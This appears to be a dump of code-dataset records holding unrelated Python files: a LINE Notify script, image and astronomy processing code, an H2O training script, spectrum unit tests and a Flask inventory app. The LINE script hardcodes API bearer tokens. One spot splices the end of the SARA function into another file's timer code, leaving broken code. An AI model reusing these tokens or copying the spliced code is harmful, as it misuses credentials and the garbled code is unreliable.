requests\r\n\r\n\r\n\r\ndef lineNotifyMessage(token='lkGIyFAxVcJcW9qswWggKzarqaTGQJu9QkqjksmcdKD', msg='Notify from LINE, HELLO WORLD'):\r\n headers = {\r\n \"Authorization\": \"Bearer \" + token,\r\n \"Content-Type\": \"application/x-www-form-urlencoded\"\r\n }\r\n\r\n payload = {'message': msg}\r\n r = requests.post(\"https://notify-api.line.me/api/notify\", headers=headers, params=payload)\r\n return r.status_code\r\n\r\n\r\n\r\n\r\ndef main():\r\n\r\n lineNotifyMessage(token='zqTJF3vTvJbTHwkmKs9J74PPdX8iuNwwM9ix8SGKGqG')\r\n\r\nif __name__ == '__main__':\r\n\r\n main()\r\n print('Complete!!!!!!!!!!')","sub_path":"line/line_notify_message.py","file_name":"line_notify_message.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"174964623","text":"import os\nimport cv2\nimport copy\nimport numpy as np\nimport tensorflow as tf\nfrom os import listdir\nfrom pathlib import Path\nfrom os.path import isfile, join\nfrom tqdm import tqdm\nfrom sklearn.datasets import load_sample_image\nfrom sklearn.feature_extraction import image\n\nimport matplotlib.pyplot as plt\n\ndef create(pp, img, p):\n\n img_ = np.zeros((p, 128, 128, 1), dtype=np.float32)\n\n for i in range(len(img)):\n mask = np.random.choice([0, 1], size=(128, 128), p=[1-pp, pp])\n idx_w, idx_h = np.where(mask == 1)\n \n for j in range(len(idx_w)):\n img[i, idx_w[j],idx_h[j],0] = 0\n \n img_[i,:,:,0] = img[i,:,:,0]\n return img_\n\ndef curate(path, lt, x, y):\n \n cnt = 0\n for idx, j in 
tqdm(enumerate(lt)):\n onlyfiles = [f for f in listdir(lt[idx]) if isfile(join(lt[idx], f))]\n onlyfiles.remove('Thumbs.db')\n\n for _, i in enumerate(onlyfiles):\n p = join(str(lt[idx]),i)\n img = cv2.imread(p, 0)\n y_patches = image.extract_patches_2d(img, (128,128), max_patches = 8)\n \n y_patches = np.reshape(y_patches,(8, 128,128,-1))\n\n \n y_patch = copy.deepcopy(y_patches)\n x_patches = create(0.85, y_patch, 8)\n \n for k in range(len(x_patches)):\n x[cnt] = x_patches[k]\n y[cnt] = y_patches[k]\n cnt += 1\n\ndef curate_(path, lt, x, y):\n\n cnt = 0\n for idx, j in tqdm(enumerate(lt)):\n onlyfiles = [f for f in listdir(lt[idx]) if isfile(join(lt[idx], f))]\n\n for _, i in enumerate(onlyfiles):\n p = join(str(lt[idx]),i)\n img = cv2.imread(p, 0)\n y_patches = image.extract_patches_2d(img, (128,128), max_patches = 2)\n\n y_patches = np.reshape(y_patches,(2, 128,128,-1))\n\n\n y_patch = copy.deepcopy(y_patches)\n x_patches = create(0.85, y_patch, 2)\n\n for k in range(len(x_patches)):\n x[cnt] = x_patches[k]\n y[cnt] = y_patches[k]\n cnt += 1\n\ndef imgSave():\n \n x_ = np.zeros((10, 128, 128, 1), dtype=np.uint8)\n y_ = np.zeros((10, 128, 128, 1), dtype=np.uint8)\n\n data = Path('/workspace/storage/cnn-cs/data/test')\n lst = os.listdir(data)\n lst.sort()\n\n count = 0\n\n for _, i in enumerate(lst):\n p = join(data,i)\n img = cv2.imread(p, 0)\n\n y_patches = image.extract_patches_2d(img, (128, 128), max_patches = 1)\n y_patches = np.reshape(y_patches,(1, 128, 128,-1))\n y_patch = copy.deepcopy(y_patches)\n x_patches = create(0.10, y_patch, 1)\n\n for k in range(len(x_patches)):\n x_[count] = x_patches[k]\n y_[count] = y_patches[k]\n count += 1\n\n x_ = x_ / 255.\n y_ = y_ / 255.\n\n fig = plt.figure(figsize=(25, 25))\n columns = 10\n rows = 1\n for i in range(1, columns*rows + 1):\n img_x = x_[i-1]\n ax = fig.add_subplot(rows, columns, i)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(np.reshape(img_x,(128,128)),cmap='gray')\n\n plt.savefig('/workspace/data/image_sparse.png')\n \n model = tf.keras.models.load_model('/workspace/data/cs-simple-model-1000.h5', compile =False)\n \n predict = model.predict(x_[:10,:,:,:])\n \n fig = plt.figure(figsize=(25, 25))\n columns = 10\n rows = 1\n for i in range(1, columns*rows + 1):\n img_x = predict[i-1]\n ax = fig.add_subplot(rows, columns, i)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(np.reshape(img_x,(128,128)), cmap='gray')\n\n plt.savefig('/workspace/data/image_recons.png')\n psnr_ = tf.image.psnr(y_[:10,:,:,:], predict, max_val=1.0)\n print(psnr_)\n\ndef printResult(X, Y):\n\n fig = plt.figure(figsize=(9, 4))\n columns = 10\n rows = 1\n for i in range(1, columns*rows + 1):\n img_x = X[i-1]\n ax = fig.add_subplot(rows, columns, i)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(img_x, cmap = 'gray')\n plt.show()\n return None \n\ndef saveResult():\n rows = 3\n cols = 3\n\n fig = plt.figure(figsize=(12,10))\n\n for i in range(1,rows+1):\n for j in range(1, cols+1):\n img = cv2.imread(os.path.join(os.getcwd(),onlyfewfiles[((i-1)*rows)+j - 1]), 0)\n patch = image.extract_patches_2d(img, (128,128), max_patches = 1)\n img = np.resize(patch,(128,128))\n ax = fig.add_subplot(rows, cols, ((i-1)*rows)+j)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_title('{}\\nNewline'.format(onlyfewfiles[((i-1)*rows)+j - 1]), fontsize=8)\n plt.imshow(img, cmap='gray')\n\n plt.show()\n\n return None\n\ndef convertModel(path):\n \n lst = [x for x in os.listdir(path) if os.path.isdir(os.path.join(path,x))]\n\n for idx, val in enumerate(lst):\n 
converter = tf.lite.TFLiteConverter.from_saved_model(path+'/'+val)\n tflite_model = converter.convert()\n with open('/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/'+val+'-model.tflite', 'wb') as f:\n f.write(tflite_model)\n return None\n\ndef extractWeights(path):\n \n model = tf.keras.models.load_model(path, compile=False)\n\n for layer in model.layers:\n if len(layer.weights) > 0:\n print(layer.name, layer.weights[0].shape)\n print(np.where(layer.weights[0] == 0))\n\n return None\n\nif __name__ == \"__main__\":\n\n '''\n count_n = 0\n IMG_WIDTH = 128\n IMG_HEIGHT = 128\n\n Path1 = Path('/workspace/storage/cnn-cs/data/images')\n Path2 = Path('/workspace/storage/cnn-cs/data/train')\n\n lst = [x for x in Path1.iterdir() if Path1.is_dir()]\n lst_ = [x for x in Path2.iterdir() if Path2.is_dir()] \n\n for i in range(len(lst)):\n count_n += len(os.listdir(os.path.join(Path1,lst[i]))) - 1\n \n x_train = np.zeros((count_n * 8, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n y_train = np.zeros((count_n * 8, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n\n curate(Path1, lst, x_train, y_train)\n\n count_n = 0\n\n for i in range(len(lst_)):\n count_n += len(os.listdir(os.path.join(Path2,lst_[i]))) \n\n X_train = np.zeros((count_n * 2, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n Y_train = np.zeros((count_n * 2, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n\n curate_(Path2, lst_, X_train, Y_train)\n \n\n convertModel()\n '''\n\n\n #p_hi = '/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/hi-model/cs-hi-model-500.h5'\n p_simple = '/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/simple-model/cs-simple-model-500.h5'\n p_sq = '/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/sq-model/cs-sq-model-500.h5'\n extractWeights(p_sq)\n","sub_path":"utils/utilities_new.py","file_name":"utilities_new.py","file_ext":"py","file_size_in_byte":6833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"298539245","text":"from multiprocessing import Value\nimport numpy as np\nfrom pfb.opt import power_method, pcg, primal_dual\nfrom pfb.operators import PSF, DaskPSI\n\ndef grad_func(x, dirty, psfo):\n return psfo.convolve(x) - dirty\n\ndef sara(psf, model, residual, sig_21=1e-6, sigma_frac=0.5, \n mask=None, beam=None, dual=None, weights21=None, \n nthreads=1, maxit=10, gamma=0.99, tol=1e-3, # options for outer optimisation\n psi_levels=3, psi_basis=None, # sara dict options\n reweight_iters=None, reweight_alpha_ff=0.5, reweight_alpha_percent=10, # reweighting options\n pdtol=1e-6, pdmaxit=250, pdverbose=1, positivity=True, tidy=True, # primal dual options\n cgtol=1e-6, cgminit=25, cgmaxit=150, cgverbose=1, # conjugate gradient options\n pmtol=1e-5, pmmaxit=50, pmverbose=1): # power method options\n \n if len(residual.shape) > 3:\n raise ValueError(\"Residual must have shape (nband, nx, ny)\")\n \n nband, nx, ny = residual.shape\n\n if beam is None:\n beam = lambda x: x\n else:\n try:\n assert beam.shape == (nband, nx, ny)\n beam = lambda x: beam * x\n except:\n raise ValueError(\"Beam has incorrect shape\")\n\n if mask is None:\n mask = lambda x: x\n else:\n try:\n if mask.ndim == 2:\n assert mask.shape == (nx, ny)\n mask = lambda x: mask[None] * x\n elif mask.ndim == 3:\n assert mask.shape == (1, nx, ny)\n mask = lambda x: mask * x\n else:\n raise ValueError\n except:\n raise ValueError(\"Mask has incorrect shape\")\n\n # PSF operator\n psfo = PSF(psf, nthreads=nthreads, 
imsize=residual.shape, mask=mask, beam=beam)\n residual = beam(mask(residual))\n if model.any():\n dirty = residual + psfo.convolve(model)\n else:\n dirty = residual\n\n # wavelet dictionary\n if psi_basis is None:\n psi = DaskPSI(imsize=residual.shape, nlevels=psi_levels, nthreads=nthreads)\n else:\n if not isinstance(psi_basis, list):\n psi_basis = [psi_basis]\n psi = DaskPSI(imsize=residual.shape, nlevels=psi_levels, nthreads=nthreads, bases=psi_basis)\n \n # l21 weights and dual \n if weights21 is None:\n print(\" Initialising all l21 weights to unity.\")\n weights21 = np.ones((psi.nbasis, psi.nmax), dtype=residual.dtype)\n if dual is None:\n dual = np.zeros((psi.nbasis, nband, psi.nmax), dtype=residual.dtype)\n\n # l21 reweighting\n if reweight_iters is not None:\n reweight_iters = list(reweight_iters)\n else:\n reweight_iters = []\n \n # residual\n residual_mfs = np.sum(residual, axis=0)\n rms = np.std(residual_mfs)\n rmax = np.abs(residual_mfs).max()\n \n # preconditioning operator\n def hess(x): \n return psfo.convolve(x) + x / (sigma_frac*rmax) \n\n if tidy:\n # spectral norm\n posthess = hess\n beta, betavec = power_method(hess, residual.shape, tol=pmtol, maxit=pmmaxit, verbosity=pmverbose)\n else:\n posthess = lambda x: x\n beta = 1.0\n betavec = 1.0\n\n # deconvolve\n for i in range(0, maxit):\n M = lambda x: x * (sigma_frac*rmax) # preconditioner\n x = pcg(hess, residual, np.zeros(residual.shape, dtype=residual.dtype), M=M, tol=cgtol,\n maxit=cgmaxit, minit=cgminit, verbosity=cgverbose)\n \n # update model\n modelp = model\n model = modelp + gamma * x\n model, dual = primal_dual(posthess, model, modelp, dual, sig_21, psi, weights21, beta,\n tol=pdtol, maxit=pdmaxit, report_freq=25, mask=mask, verbosity=pdverbose,\n positivity=positivity)\n\n # reweighting\n if i in reweight_iters:\n l2_norm = np.linalg.norm(dual, axis=1)\n for m in range(psi.nbasis):\n indnz = l2_norm[m].nonzero()\n alpha = np.percentile(l2_norm[m, indnz].flatten(), reweight_alpha_percent)\n alpha = np.maximum(alpha, 1e-8) # hardcode minimum\n weights21[m] = alpha/(l2_norm[m] + alpha)\n reweight_alpha_percent *= reweight_alpha_ff\n\n # get residual\n residual = -grad_func(model, dirty, psfo)\n \n # check stopping criteria\n residual_mfs = np.sum(residual, axis=0)\n rmax = np.abs(residual_mfs).max()\n rms = np.std(residual_mfs)\n eps = np.linalg.norm(model - modelp)/np.linalg.norm(model)\n\n print(\" SARA - At iteration %i peak of residual is %f, rms is %f, current eps is %f\" % (i+1, rmax, rms, eps))\n\n if eps < tol:\n print(\" SARA - Success, convergence after %i iterations\" %(i+1))\n break\n\n if tidy and i2}:{:0>2}:{:05.2f}\".format(int(hours), int(minutes), seconds))\n\n\nif __name__ == \"__main__\":\n\n # candidates\n run_three = {}\n # run_three[\"ERR188345Aligned.sortedByCoord.out\"] = 163\n # run_three[\"ERR188453Aligned.sortedByCoord.out\"] = 163\n # run_three[\"ERR188479Aligned.sortedByCoord.out\"] = 203\n run_three[\"SRR5968867_s\"] = 123\n run_three[\"SRR5959996_s\"] = 214\n run_three[\"SRR5968940_s\"] = 175\n\n # loop all candidates\n for file_name, readlength in run_three.items():\n print(file_name, str(readlength))\n\n total_time_start = time.time()\n\n # parameters\n\n ### scRNA seq\n # file_name = \"SRR5968905_s\"\n # dir = \"bwa_scRNA\"\n # RNASEQ = \"/data/zhendi/wei/\" + dir + \"/seq/\" + file_name + \".rds\"\n\n ### RNA seq\n # file_name = \"ERR188288Aligned.sortedByCoord.out\"\n # readlength = 205\n seq = \"bwa_scRNA\" # \"star_RNAseq\"\n root = \"/data/zhendi/wei\"\n RNASEQ = 
os.path.join(root, seq, \"seq\", file_name + \".rds\")\n models = [\"GLM\"] # , \"RF\", \"XGB\", \"DL\"]\n labels = [\"count_5\", \"count_overlap\"]\n\n # load data\n start = time.time()\n pandas2ri.activate()\n readRDS = robjects.r[\"readRDS\"]\n mydf = readRDS(RNASEQ)\n mydf = mydf.sample(frac=0.01, replace=True, random_state=1)\n mydf.rename(\n columns={\n \"fitpar..i...count\": \"count_5\",\n \"fitpar..i...count_overlap\": \"count_overlap\",\n },\n inplace=True,\n )\n mydf = mydf.reset_index()\n mydf = mydf.astype(\"int32\")\n end = time.time()\n\n # paths\n # seq_path: RNAseq or scRNAseq\n seq_path = os.path.join(root, \"GC\", seq) # '/data/zhendi/wei/GC/star_RNAseq/'\n print(\"seq_path: \", seq_path)\n if not os.path.exists(seq_path):\n os.mkdir(seq_path)\n\n # save_path: which sample\n save_path = os.path.join(\n seq_path, file_name\n ) # '/data/zhendi/wei/baseline/star_RNAseq/ERR188021Aligned.sortedByCoord.out\n print(\"save_path: \", save_path)\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n all_path = {}\n all_path[\"seq_path\"] = seq_path\n all_path[\"save_path\"] = save_path\n\n # init h2o\n h2o.init(ip=\"localhost\", port=54321, nthreads=15)\n\n # training\n for label in labels:\n # paths\n # label_path: modeling count_5 or count_overlap\n label_path = os.path.join(\n save_path, label\n ) # '/data/zhendi/wei/baseline/star_RNAseq/ERR188021Aligned.sortedByCoord.out/count_5\n print(\"label_path: \", label_path)\n if not os.path.exists(label_path):\n os.mkdir(label_path)\n\n # data_path: tuple of (X, y, train)\n data_path = os.path.join(\n label_path, \"data\"\n ) # '/data/zhendi/wei/baseline/star_RNAseq/ERR188021Aligned.sortedByCoord.out/count_5/data\n print(\"data_path: \", data_path)\n if not os.path.exists(data_path):\n os.mkdir(data_path)\n\n all_path[\"label_path\"] = label_path\n all_path[\"data_path\"] = data_path\n\n # get data\n print(\"Getting training data:\")\n X, y, train = get_model_data(all_path, mydf, label)\n\n for model in models:\n\n # path\n # model_path: GLM, RF, XGB, DL, saving estimator, metrics, and labels\n model_path = os.path.join(label_path, model)\n print(\"model_path: \", model_path)\n if not os.path.exists(model_path):\n os.mkdir(model_path)\n\n all_path[\"model_path\"] = model_path\n\n # training\n print(\"Training: Label: \" + label + \" Model: \" + model)\n training(all_path, model, X, y, train, label)\n\n # total time\n total_time_end = time.time()\n timer(total_time_start, total_time_end)\n\n # shutdown h2o\n h2o.shutdown()\n","sub_path":"02_baseline/h2o_GC_baseline.py","file_name":"h2o_GC_baseline.py","file_ext":"py","file_size_in_byte":11513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"313204948","text":"import pygame\nimport math\nimport components.mehdi as mehdi\nimport components.flame as flame\n\nclass npc:\n\n def __init__(self, image, rect, statement):\n self.image = image\n self.collide = self.imageRect = rect\n self.statement = []\n\n for s in statement.split():\n if mehdi.dialog[s][\"singleTrigger\"]:\n if s not in flame.master_user['dialogCompleted']:\n self.statement.append([mehdi.dialog[s], s])\n else:\n pass\n else:\n self.statement.append([mehdi.dialog[s], s])\n\n def interact(self, player):\n if math.hypot(player.playerRect.center[0] - self.collide.center[0], player.playerRect.center[1] - self.collide.center[1]) < 150:\n newdialog = []\n currentdialog = []\n for dialog in self.statement:\n currentdialog.append(dialog[0]['dialog'])\n if 
dialog[0][\"singleTrigger\"]:\n flame.master_user['dialogCompleted'].append(dialog[1])\n else:\n newdialog.append(dialog)\n\n self.statement = newdialog\n return currentdialog\n\n else:\n return False\n\n def draw(self, surface, player):\n if self.imageRect.colliderect(player.screenRect):\n surface.blit(self.image, (self.imageRect.x - player.cam_x, self.imageRect.y - player.cam_y))\n","sub_path":"components/npc.py","file_name":"npc.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"194727386","text":"from __future__ import print_function, absolute_import, \\\n division, unicode_literals\nimport os\nimport pytest\nfrom astropy import units as u\nimport numpy as np\n\nfrom linetools.spectra import io\nfrom linetools.spectra.xspectrum1d import XSpectrum1D\nfrom linetools.spectra import utils as ltsu\n\n\n@pytest.fixture\ndef spec():\n return io.readspec(data_path('UM184_nF.fits'))\n\n\n@pytest.fixture\ndef spec2():\n return io.readspec(data_path('PH957_f.fits'))\n\n\n@pytest.fixture\ndef specm(spec,spec2):\n specm = ltsu.collate([spec,spec2])\n return specm\n\n\ndef data_path(filename):\n data_dir = os.path.join(os.path.dirname(__file__), 'files')\n return os.path.join(data_dir, filename)\n\n\ndef test_collate(spec,spec2):\n coll_spec = ltsu.collate([spec,spec2])\n assert coll_spec.nspec == 2\n assert coll_spec.totpix == 20379\n\n\ndef test_rebin_to_rest(spec,spec2):\n zarr = np.array([2.1,2.2])\n # Build spectra array\n coll_spec = ltsu.collate([spec,spec2])\n rest_spec = ltsu.rebin_to_rest(coll_spec, zarr, 100*u.km/u.s, debug=False)\n # Test\n assert rest_spec.totpix == 3716\n np.testing.assert_allclose(rest_spec.wvmin.value, 986.3506403, rtol=1e-5)\n\n\ndef test_smash_spectra(spec,spec2):\n # Try to stack 2 spectra with different wavelengths\n coll_spec = ltsu.collate([spec,spec2])\n with pytest.raises(AssertionError):\n stack = ltsu.smash_spectra(coll_spec)\n # Stack rebinned\n zarr = np.array([2.1,2.2])\n rest_spec = ltsu.rebin_to_rest(coll_spec, zarr, 100*u.km/u.s, debug=False)\n stack = ltsu.smash_spectra(rest_spec, method='average')\n # Test\n assert stack.totpix == 3716\n np.testing.assert_allclose(stack.flux[1].value, -3.3213510, rtol=1e-5)\n\n\ndef test_airtovac_andback(spec):\n npix = 1000\n spec = XSpectrum1D.from_tuple((np.linspace(5000.,6000,npix), np.ones(npix)))\n # Airtovac\n spec.meta['airvac'] = 'air'\n spec.airtovac()\n # Test\n np.testing.assert_allclose(spec.wavelength[0].value, 5001.394869990007, rtol=1e-5)\n assert spec.meta['airvac'] == 'vac'\n # Vactoair\n spec.vactoair()\n np.testing.assert_allclose(spec.wavelength[0].value, 5000., rtol=1e-5)\n assert spec.meta['airvac'] == 'air'\n\n\ndef test_rebin(spec, specm):\n # Rebin\n new_wv = np.arange(3000., 9000., 5) * u.AA\n newspec = spec.rebin(new_wv)\n # Test\n np.testing.assert_allclose(newspec.flux[1000], 0.9999280967617779)\n assert newspec.flux.unit is u.dimensionless_unscaled\n # With sigma\n newspec = spec.rebin(new_wv, do_sig=True)\n imn = np.argmin(np.abs(newspec.wavelength-8055*u.AA))\n np.testing.assert_allclose(newspec.sig[imn].value, 0.0169634, rtol=1e-5)\n # With NANs\n spec.data['flux'][spec.select][100:110] = np.nan\n newspec = spec.rebin(new_wv)\n np.testing.assert_allclose(newspec.flux[1000], 0.9999280967617779)\n # All\n spec2 = specm.rebin(new_wv, all=True)\n np.testing.assert_allclose(spec2.wvmax.value, 8995.0)\n\n\ndef test_addnoise(spec):\n #\n newspec = spec.add_noise(seed=12)\n 
np.testing.assert_allclose(newspec.flux[1000].value, 0.6003435, rtol=1e-5)\n\n # With S/N input\n newspec2 = spec.add_noise(seed=19,s2n=10.)\n np.testing.assert_allclose(newspec2.flux[1000].value, -0.130012, rtol=1e-5)\n\n\ndef test_box_smooth(spec):\n # Smooth\n newspec3 = spec.box_smooth(3)\n np.testing.assert_allclose(newspec3.flux[4000], 0.9650185, rtol=1e-5)\n assert newspec3.flux.unit == u.dimensionless_unscaled\n\n newspec5 = spec.box_smooth(5)\n np.testing.assert_allclose(newspec5.flux[3000], 1.0405008,rtol=1e-5)\n # Preserve\n newspec5p = spec.box_smooth(5, preserve=True)\n\n\ndef test_gauss_smooth(spec):\n # Smooth\n smth_spec = spec.gauss_smooth(4.)\n # Test\n np.testing.assert_allclose(smth_spec.flux[3000].value, 0.749937, rtol=1e-5)\n assert smth_spec.flux.unit == spec.flux.unit\n\n\ndef test_ivar_smooth(spec):\n # Smooth\n smth_spec = spec.ivar_smooth(4)\n # Test\n np.testing.assert_allclose(smth_spec.flux[3000].value, 0.7220675349235535, rtol=1e-5)\n assert smth_spec.flux.unit == spec.flux.unit\n\n\ndef test_rebintwo(spec):\n # Add units\n funit = u.erg/u.s/u.cm**2\n spec.units['flux'] = funit\n # Rebin\n new_wv = np.arange(3000., 9000., 5) * u.AA\n newspec = spec.rebin(new_wv, do_sig=True)\n # Test\n np.testing.assert_allclose(newspec.flux[1000].value, 0.992559, rtol=1e-5)\n assert newspec.flux.unit == funit\n # Without sig\n spec_nosig = XSpectrum1D.from_tuple((spec.wavelength, spec.flux))\n newspec = spec.rebin(new_wv)\n assert newspec.sig_is_set is False\n\n\ndef test_relvel(spec):\n\n # Velocity\n velo = spec.relative_vel(5000.*u.AA)\n # Test\n np.testing.assert_allclose(velo[6600].value, -2322.625, rtol=1e-5)\n assert velo.unit == (u.km/u.s)\n\n\ndef test_splice_two(spec, spec2):\n spec3 = ltsu.splice_two(spec, spec2)\n assert spec3.npix == 18390\n\n\ndef test_stitch(specm):\n spec = specm.stitch()\n assert spec.npix == 18390\n\n\ndef test_copy(spec):\n # From existing\n spec2 = spec.copy()\n assert spec.wavelength[0] == spec2.wavelength[0]\n assert spec.flux[-1] == spec2.flux[-1]\n #\n wave = np.arange(3000., 6500)\n npix = len(wave)\n spect = XSpectrum1D.from_tuple((wave*u.AA,np.ones(npix)))\n specf = spect.copy()\n assert specf.sig_is_set is False\n\n\ndef test_plot(spec):\n spec.plot(show=False)\n\n\ndef test_continuum_utils(spec):\n # define continuum in a non-interactive way...\n n = len(spec.wavelength.value)\n contpoints = [(spec.wavelength.value[i], 1.) 
for i in range(n)[::int(n/100)]]\n spec.meta['contpoints'] = contpoints\n xy = np.array(spec.meta['contpoints'])\n xy = xy.transpose()\n x, y = xy[0], xy[1]\n # test interpolate\n spec.normalize(spec._interp_continuum(x, y, spec.wavelength.value))\n np.testing.assert_allclose(spec.co, 1.)\n co_old = spec.co\n # test perturb\n spec.perturb_continuum(rel_var=0.05, seed=2)\n assert all(co_old != spec.co)\n np.testing.assert_allclose(np.max(spec.co), 1.11636, rtol=1e-5)\n np.testing.assert_allclose(np.min(spec.co), 0.8658872, rtol=1e-5)\n\n #test reset\n spec.reset_continuum()\n np.testing.assert_allclose(spec.co, 1.)\n\n # Test generation of normalized spec\n norm_spec = spec.normalized_spec()\n assert isinstance(norm_spec, XSpectrum1D)\n assert norm_spec.normed is False\n\n # test normalize/unnormalize\n flux_old = spec.flux\n spec.unnormalize()\n assert spec.normed is False\n np.testing.assert_allclose(spec.flux,flux_old)\n\n\ndef test_assignment(spec):\n temp = np.arange(1, spec.npix + 1)\n spec.wavelength = temp * u.m\n assert spec.wavelength[0] == temp[0] * u.m\n unit = u.erg / u.s / u.cm**2 / u.AA\n spec.flux = temp * unit\n assert spec.flux[0] == temp[0] * unit\n spec.sig = temp\n assert spec.sig[0] == temp[0] * unit\n spec.co = temp\n assert spec.co[0] == temp[0] * unit\n\n\ndef test_wvmnx():\n npix = 1000\n # Without sig\n spec = XSpectrum1D.from_tuple((np.linspace(5000.,6000,npix), np.ones(npix)))\n assert spec.wvmin.value == 5000.\n assert spec.wvmax.value == 6000.\n # With sig\n spec = XSpectrum1D.from_tuple((np.linspace(5000.,6000,npix), np.ones(npix),\n np.ones(npix)*0.1))\n assert spec.wvmin.value == 5000.\n assert spec.wvmax.value == 6000.\n\n","sub_path":"linetools/spectra/tests/test_xspec_utils.py","file_name":"test_xspec_utils.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"350296092","text":"\nfrom flask import Flask, request, render_template\nfrom unidecode import unidecode\nimport gspread\nimport datetime\nimport os\n\n#Conexão com a Planilha\nconexao = gspread.service_account()\nplanilha = conexao.open(\"Nature Saboaria\").sheet1\ntransacoes = conexao.open(\"transacoes\").sheet1\n\n#Aplicação:\n#A variável root_path você deve modificar com o caminho completo da pasta python no seu sistema, serve para o Flask achar a pasta templates corretamente ^^\n#O app.config define a pasta padrão onde as imagens mandadas no form devem serem salvas!\napp = Flask(\"Estoque-SIM-SA\", root_path=\"/home/lucas/Desktop/estoque-sim-sa/Controle de estoque/python\")\napp.config['UPLOAD_FOLDER'] = '/home/lucas/Desktop/estoque-sim-sa/Controle de estoque/python/static'\n#app = Flask(\"Estoque-SIM-SA\", root_path=\"C:\\\\Users\\\\luqui\\\\OneDrive\\\\Área de Trabalho\\\\estoque-sim-sa\\\\Controle de estoque\\\\python\")\n#app.config['UPLOAD_FOLDER'] = 'C:\\\\Users\\\\luqui\\\\OneDrive\\\\Área de Trabalho\\\\estoque-sim-sa\\\\Controle de estoque\\\\python\\\\python'\n#app = Flask(\"Estoque-SIM-SA\", root_path=\"/home/rafael/Área de Trabalho/Controle de estoque/estoque-sim-sa/Controle de estoque/python\")\n#app.config[\"UPLOAD_FOLDER\"] = \"/home/rafael/Área de Trabalho/Controle de estoque/estoque-sim-sa/Controle de estoque/static\"\n#app = Flask(\"Estoque-SIM-SA\", root_path=\"H:\\\\Users\\\\agata\\\\Documents\\\\projeto trainee\\\\estoque-sim-sa\\\\Controle de estoque\\\\python\")\n#app = Flask(\"Estoque-SIM-SA\", root_path=\"C:\\\\Users\\\\tanko\\\\estoque-sim-sa\\\\Controle de 
estoque\\\\python\")\n#app.config[\"UPLOAD_FOLDER\"] = \"C:\\\\Users\\\\tanko\\\\estoque-sim-sa\\\\Controle de estoque\\\\python\\\\static\"\n\n@app.route(\"/\")\ndef main():\n #Pegando os toda a planilha de transações\n tudo = transacoes.get_all_values()\n\n #Criando uma Dicionário com todas as transações do DIA e já juntando as que tiverem repetidas em uma só, somando as quantidades\n dia = {}\n for transacao in tudo:\n if int(transacao[5]) == datetime.datetime.today().day:\n try:\n dia[unidecode(transacao[0]).lower()] += int(transacao[1])\n except:\n dia[unidecode(transacao[0]).lower()] = int(transacao[1])\n #Ordenando o dicionário pelo produto de maior quantidade:\n dia = sorted(dia.items(), key=lambda transacao: transacao[1], reverse=True)\n if dia == []:\n dia.append([\"Não houve nenhuma transação hoje\", 1])\n\n #Criando uma Dicionário com todas as transações do MÊS e já juntando as que tiverem repetidas em uma só, somando as quantidades\n mes = {}\n for transacao in tudo:\n if int(transacao[6]) == datetime.datetime.today().month:\n try:\n mes[unidecode(transacao[0]).lower()] += int(transacao[1])\n except:\n mes[unidecode(transacao[0]).lower()] = int(transacao[1])\n #Ordenando o dicionário pelo produto de maior quantidade:\n mes = sorted(mes.items(), key=lambda transacao: transacao[1], reverse=True)\n if mes == []:\n mes.append([\"Não houve nenhuma transação esse mês\", 1])\n \n #Criando uma Dicionário com todas as transações do ANO e já juntando as que tiverem repetidas em uma só, somando as quantidades\n ano = {}\n for transacao in tudo:\n if int(transacao[7]) == datetime.datetime.today().year:\n try:\n ano[unidecode(transacao[0]).lower()] += int(transacao[1])\n except:\n ano[unidecode(transacao[0]).lower()] = int(transacao[1])\n #Ordenando o dicionário pelo produto de maior quantidade:\n ano = sorted(ano.items(), key=lambda transacao: transacao[1], reverse=True)\n if ano == []:\n ano.append([\"Não houve nenhuma transação esse ano\", 1])\n\n return render_template(\"home.html\", diaQuantidade = dia, mesQuantidade = mes, anoQuantidade = ano)\n\n#Roteamento para remover um produto\n@app.route(\"/remover\", methods=[\"POST\"])\ndef deleteProduto():\n #Pesquisa o nome enviado na planilha\n remover = planilha.find(request.form.get(\"delete\"))\n\n #Faz a remoção do produto e avalia se a exclusão foi bem sucedida ou não\n if planilha.delete_rows(remover.row):\n return u\"\"\"\n \n \"\"\"\n else:\n return u\"\"\"\n \n \"\"\"\n\n#Roteamento para remover uma transação\n@app.route(\"/deleteTransacao\", methods=[\"POST\"])\ndef deleteTransacao():\n #Faz a remoção da transação e avalia se a exclusão foi bem sucedida ou não\n rm = transacoes.find(request.form.get(\"transacao\"))\n if transacoes.delete_rows(rm.row):\n return u\"\"\"\n \n \"\"\"\n else:\n return u\"\"\"\n \n \"\"\"\n\n\n# Captura qual é o item que irá ser retirada uma determinada quantidade, e exibe o popup\n@app.route('/popup', methods=['POST'])\ndef popup():\n item = planilha.find(request.form.get('item'))\n img = planilha.cell(item.row, 6)\n return render_template('popup.html',\n planilha_completa = planilha.get_all_values(),\n nome = item.value,\n imagem = img.value,\n quantidade = planilha.cell(item.row, 2).value,\n preço = planilha.cell(item.row, 3).value\n )\n\n# Roteamento para remover uma quantidade de um produto, caso a quantidade do produto fique abaixo do limite, ele dispara um alerta\n@app.route(\"/venda\", methods=[\"POST\"])\ndef venda():\n # Procura o Produto\n rm = planilha.find(request.form.get('nome'))\n\n 
